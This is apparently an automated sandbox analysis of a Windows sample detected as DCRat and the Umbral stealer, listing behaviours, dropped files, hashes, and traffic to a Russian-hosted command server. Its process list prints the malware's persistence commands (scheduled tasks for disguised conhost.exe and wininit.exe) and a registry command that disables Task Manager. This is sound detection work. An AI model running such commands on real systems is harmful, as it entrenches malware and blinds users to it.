Analysis Overview
SHA256
4174a9073fea7b22d8a973e2891d996b7d5b0eb94a85c538cd7da1a2c4c1e9c7
Threat Level: Known bad
The file 898a94f29edc228ce3bd2054f3d5d6dd.bin was found to be: Known bad.
Malicious Activity Summary
Umbral
Detect Umbral payload
DcRat
Process spawned unexpected child process
DCRat payload
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Disables Task Manager via registry modification
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Creates scheduled task(s)
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Detects videocard installed
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-05 01:28
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-05 01:28
Reported
2024-05-05 01:30
Platform
win7-20240221-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
DcRat
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
Umbral
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\stealer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\чекер dc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Inject.exe | N/A |
| N/A | N/A | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
| N/A | N/A | C:\Windows\inf\conhost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Program Files (x86)\Windows Mail\de-DE\56085415360792 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\inf\conhost.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File opened for modification | C:\Windows\inf\conhost.exe | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| File created | C:\Windows\inf\088424020bedd6 | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\stealer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\MsWinsessiondllNet\driverBrokercommon.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\inf\conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe
"C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"
C:\Users\Admin\AppData\Local\Temp\stealer.exe
"C:\Users\Admin\AppData\Local\Temp\stealer.exe"
C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"
C:\Users\Admin\AppData\Local\Temp\Inject.exe
"C:\Users\Admin\AppData\Local\Temp\Inject.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "
C:\MsWinsessiondllNet\driverBrokercommon.exe
"C:\MsWinsessiondllNet\driverBrokercommon.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\inf\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\inf\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\inf\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Mail\de-DE\wininit.exe'" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\UaJRNF11a2.bat"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\inf\conhost.exe
"C:\Windows\inf\conhost.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0a0a1e6e-5481-4639-ae8b-5fea2ac76621.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\93f16f6c-47c0-4cae-90c5-45b4dc351db8.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0cd5995c-5c03-4040-b512-619c1eccbcb3.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6244d727-ed45-43e8-ad89-3c478c88af5c.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d78b4399-8139-4837-973a-f2f0f90fe745.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5ac14dba-f1e7-43c2-8a6c-dda8c9a7323c.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9e1306a1-7d80-41d9-a54a-66f1727dc77c.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d5150883-ed23-4482-a854-c5a2a66d82ea.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2b170f59-441c-4133-a8dc-1297c5cdbc6a.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b02fd538-2945-43e5-a920-0034d7675f77.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c1b0d6d0-77d3-4654-9345-549cd621ce7f.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e7714cb1-5e00-45fe-a1f0-ae5b007ec77b.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7b4f4761-f16f-4de3-b5fb-0923ce7bdfea.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ae17c003-b5fe-4f4f-be48-34d5b9eac8fe.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\39f25686-6a3e-4eda-875d-a5be55c4b30d.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dd645dac-b7c5-44f9-a4a4-3ff1610dd827.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9c5e5929-4054-4c15-bacf-e767c8424da0.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\51387e81-ee66-446b-a46a-d0e3ed1d0595.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\54d1267b-f558-4723-a5e9-e5e7f7b12168.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6139caac-670c-420e-a75c-fa399d21bd69.vbs"
C:\Windows\inf\conhost.exe
C:\Windows\inf\conhost.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2128f3e-4b1b-4b82-b696-70ee170e0496.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\799571d0-feee-4ef0-a2bd-927a43a01780.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 216.58.201.99:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | a0947008.xsph.ru | udp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
| RU | 141.8.192.103:80 | a0947008.xsph.ru | tcp |
Files
memory/2892-0-0x0000000000400000-0x000000000084E000-memory.dmp
\Users\Admin\AppData\Local\Temp\stealer.exe
| MD5 | 8cc1e7cf94fec9bc505ce7411aa28861 |
| SHA1 | 08703de84f3db427c368f16c873664d78bd83264 |
| SHA256 | cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba |
| SHA512 | fe60f11452c9e470c0b63385cf0ee8f9fd07598c1294ba25cc8c7c093142efe865aba39680ae5f80611db9423717a7094c939f180e5195e7ae91a9633872a423 |
\Users\Admin\AppData\Local\Temp\чекер dc.exe
| MD5 | 6216b6bef94c09a40bfa263809b1ae56 |
| SHA1 | a928120e65199c6aaae6c991aa0466f3f8b06020 |
| SHA256 | eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b |
| SHA512 | 0e311738b5bdf73f01c552b59646485418ab5b99862af5da2bb934d4262307ac8f57274bbd7f6c99376e6be99d424aad5282a73a063529310425666be224d215 |
memory/2508-14-0x00000000013E0000-0x0000000001420000-memory.dmp
\Users\Admin\AppData\Local\Temp\Inject.exe
| MD5 | d428ddd1b0ce85a6c96765aeaf246320 |
| SHA1 | d100efdaab5b2ad851fe75a28d0aa95deb920926 |
| SHA256 | 453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb |
| SHA512 | 3f9dda9d998ef282eb31644296ef0617bbf40352189f4ccd744191f466e932ffde2fd2bdaebe89f0bc06e465d57a8e46e08b3001fe834b3d989fc71125d25899 |
memory/2892-20-0x0000000004980000-0x00000000049AA000-memory.dmp
memory/2964-25-0x000000013F9D0000-0x000000013F9FA000-memory.dmp
C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe
| MD5 | 7c9bb5fda146efee5ee4a243d6e404b0 |
| SHA1 | c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd |
| SHA256 | 1d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b |
| SHA512 | 797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771 |
C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat
| MD5 | ea70d7b0f1a8a1ff2d246efbdcfe1001 |
| SHA1 | 252e762aee8fcc5761e17bb84aa3af8276852f5c |
| SHA256 | 1947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31 |
| SHA512 | 1fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86 |
C:\MsWinsessiondllNet\driverBrokercommon.exe
| MD5 | d84e590c3715c79dc5b92c435957d162 |
| SHA1 | 2901580903e4b356448d9fe7bea510261e655363 |
| SHA256 | d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba |
| SHA512 | b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485 |
memory/1652-37-0x00000000010E0000-0x000000000132A000-memory.dmp
memory/1652-38-0x0000000000140000-0x0000000000148000-memory.dmp
memory/1652-39-0x0000000000150000-0x0000000000158000-memory.dmp
memory/1652-40-0x0000000000190000-0x00000000001A0000-memory.dmp
memory/1652-41-0x00000000003F0000-0x0000000000446000-memory.dmp
memory/1652-42-0x0000000000170000-0x000000000017C000-memory.dmp
memory/1652-44-0x0000000000630000-0x000000000063C000-memory.dmp
memory/1652-43-0x00000000001A0000-0x00000000001AC000-memory.dmp
memory/1652-45-0x0000000000640000-0x0000000000648000-memory.dmp
memory/1652-46-0x0000000000650000-0x000000000065A000-memory.dmp
memory/1652-47-0x0000000000B00000-0x0000000000B0E000-memory.dmp
memory/1652-48-0x0000000000B10000-0x0000000000B18000-memory.dmp
memory/1652-49-0x0000000000B20000-0x0000000000B2A000-memory.dmp
memory/1652-50-0x0000000000BB0000-0x0000000000BBC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UaJRNF11a2.bat
| MD5 | f7d10cf8a502ea71bc4cf2823a716694 |
| SHA1 | 1a03facad61a8d1b448da90c60aa10b2ec73125a |
| SHA256 | e2aa65fb4d4586edde781afee4a2c45456983110fecf37800b48ca47921a6c71 |
| SHA512 | 53df9b650686d54d3e80c1a416b98e9353a89a09d3e4884212ab42a2dced1f0b400f76afc298d1d868c5504736de7ab4694a408c12358d295242937a4547d09c |
memory/2460-62-0x0000000001160000-0x00000000013AA000-memory.dmp
memory/2460-63-0x000000001A8C0000-0x000000001A916000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\0a0a1e6e-5481-4639-ae8b-5fea2ac76621.vbs
| MD5 | 54a4ab02c1f992df21647e3a4b609dc5 |
| SHA1 | 933dfdeb84d9634a6c29605a5b445b9769ad7beb |
| SHA256 | 45919df7cf84c7ef28302c045d59dc8ca5f77e79d70d1b1f85d1e524b70f5a1a |
| SHA512 | fc32ad4184906f96c4562c1544644c7c17901ce058030a6894d15639d93b73b9cf7d2a94acb0641a0c06089ceb990543cb359de3e3b420ee6622725542946b9f |
C:\Users\Admin\AppData\Local\Temp\93f16f6c-47c0-4cae-90c5-45b4dc351db8.vbs
| MD5 | 8abcd2ae172afeb4ff08339b8fcffc25 |
| SHA1 | c19f781edabe30c1d1fbf2bb7cc970456eacd060 |
| SHA256 | 1e5334f0d108336af7b8d597f3937ceb35a057922ace5b3e61e45a6cf48e0a6b |
| SHA512 | 2876bb2c9f8ac0aeb72f0bba3f907ed3dba9e5322cd28d8875d55a6a784e80d4bc032582b5977811bd6db659887e8397cca7f1aef603ec8b974936196313605f |
C:\Users\Admin\AppData\Local\Temp\0cd5995c-5c03-4040-b512-619c1eccbcb3.vbs
| MD5 | 033de561bdc7c0ca00ad0401bb082688 |
| SHA1 | 2e8f6980e6b56f46c045a55803efb854595df75c |
| SHA256 | 3dc818abd994a8ef72851ff07a297b8cd5cfdb9b5fefd67328a8927985b7da5a |
| SHA512 | 61c4b381627f40b831a08cbf5b57245c720791bf693b378ca929731522847d68d6455047735fce7a590b769dcd1414dc2169e9ac1214a3dd4a778a580d2dba8c |
C:\Users\Admin\AppData\Local\Temp\d78b4399-8139-4837-973a-f2f0f90fe745.vbs
| MD5 | 9ae89897944358d29f5cffdc7ae53012 |
| SHA1 | ac33a9b6cf573f9af6b47b488a7aef5f5a6a90d7 |
| SHA256 | f90b4075a640a9f6e66fd66a99e12cc0b28d5a3dd7481a94538e4adfb52fed57 |
| SHA512 | a062d88a1cc77a451e251a8225c2d5fb3985a14390eeb1cbfd927c4eabc69c259cd267b58c70fd6462f6269f05fce35c992e5d439c2c49fc688fb6b16954befe |
C:\Users\Admin\AppData\Local\Temp\9e1306a1-7d80-41d9-a54a-66f1727dc77c.vbs
| MD5 | e6be198e9b7e5ce620d555dd8c3ffcf0 |
| SHA1 | 4a172a1ae35f9a8cd67943c9981612467d3d45c8 |
| SHA256 | 7c097f6b2f439250559ea809c39f4bdff6acb0ee7a172aaa26d2d7a6aa5245ae |
| SHA512 | fb542d4cc53e0468211623a8b37930f9b889fec67458cf17c3e67282f2814de916705996d2663fa3e2ce1f51269e413771ceeb524f644eda09c0f6d4747cdea6 |
C:\Users\Admin\AppData\Local\Temp\2b170f59-441c-4133-a8dc-1297c5cdbc6a.vbs
| MD5 | 6febe70bd4b9501ff665cbdc618847c5 |
| SHA1 | 8840b48e3ef3baea97cf136db5020255a96e71fa |
| SHA256 | 65970a84b910cd3e31c2bd70c919c6c82bd47b6b0e590df373ca10a0f2fe8f72 |
| SHA512 | 1da13ac7bee6e3dbef7d9088449033483b17c0b2765be7c33defc945185c4ff402febe3d7498c2aef859ac01dd2b136e1e7531632bf0c6ebf93db01fd48342fa |
C:\Users\Admin\AppData\Local\Temp\c1b0d6d0-77d3-4654-9345-549cd621ce7f.vbs
| MD5 | d6c220096df3c66a29f927f521da8e5f |
| SHA1 | 572d59a219f371433f29b5a1d10f45193cffba20 |
| SHA256 | e17e34086e8e29048ccadf5e5ea9bf57643d6f834b380086e623c92dd23af439 |
| SHA512 | 8351d2c62e13732494b9979bd7a563cf88e1c7ccc0896adaef32ee5fff4ae758c998aaf413292124a8d46f5bdfaa9c7e519de03093091107c0683b93510ddbc2 |
memory/2336-129-0x0000000000610000-0x0000000000666000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7b4f4761-f16f-4de3-b5fb-0923ce7bdfea.vbs
| MD5 | 11cbace0608b5facaec85f9ab63a2743 |
| SHA1 | 071f69516a7bb9d86edeae73d13b72a3ced7abdd |
| SHA256 | a038ca5a1d89a8b89fbdce7c537dde8c878644cb4a509bac4e7386945c4bb713 |
| SHA512 | dc18040ec489320b1e060ad2ae8ca3d148812e88e99a38967b49b23e57d91c0e42d1943c5bbce6800dbb7ad10e042dd0a9bb64772fd9ed8d18e8399b632e6021 |
memory/1696-141-0x00000000000C0000-0x000000000030A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\39f25686-6a3e-4eda-875d-a5be55c4b30d.vbs
| MD5 | 5ee3bd681f680cdc5518b286570b28c2 |
| SHA1 | d86da3820b4d08031f5f263e727eb12c0881bea1 |
| SHA256 | 3ab21a3c8c8b8584c7d35ab76d6556fe281666bee0880baef4490a719a56b989 |
| SHA512 | 77585d574d8dcc0fa257c5cd11b38b0f616e74726cc4a3fd6f11d99e19ce9f3e38f6521ef43ea61d3ea59223101c2f067853a046c4edda3f9dfcf2113d557e96 |
memory/1436-153-0x00000000011F0000-0x000000000143A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9c5e5929-4054-4c15-bacf-e767c8424da0.vbs
| MD5 | 4b6b46eab9c52b28d9814e7abd31baaf |
| SHA1 | bafcefe324854d398d6f8bb506d593f59a72c3bf |
| SHA256 | 58c2bb82bf82371de06c2d3a7cad22c24e5f9e4bd94f4bf415436d5b1cc2f395 |
| SHA512 | 24b6981da8cde1d9be8ddad6e5feb7c9e2a4f1b90cf2c84f5f7f4393cefcfe70a70801e16ed5aa26b008907608280297aeb565c993e7590d2149c93dbe693692 |
C:\Users\Admin\AppData\Local\Temp\54d1267b-f558-4723-a5e9-e5e7f7b12168.vbs
| MD5 | dcee4dce741bd20ca0db644c2c5e46e7 |
| SHA1 | 11db5b4398b3f46aee65d3381bde7ba7143c22d6 |
| SHA256 | 6d725edfb7ccbf27477df652f4334171a691e9c731681c805a7d84ebd9269177 |
| SHA512 | 24efe9c8faea46acf6d3f5692ad6fb1292fd065e87196ca7cf4b46eec1ce17619936cb81a053b289ca7451e32b83f139dd12554497ef8374628fdc563907553d |
C:\Users\Admin\AppData\Local\Temp\e2128f3e-4b1b-4b82-b696-70ee170e0496.vbs
| MD5 | ee5ef58333c9ac975005e403469f5ad9 |
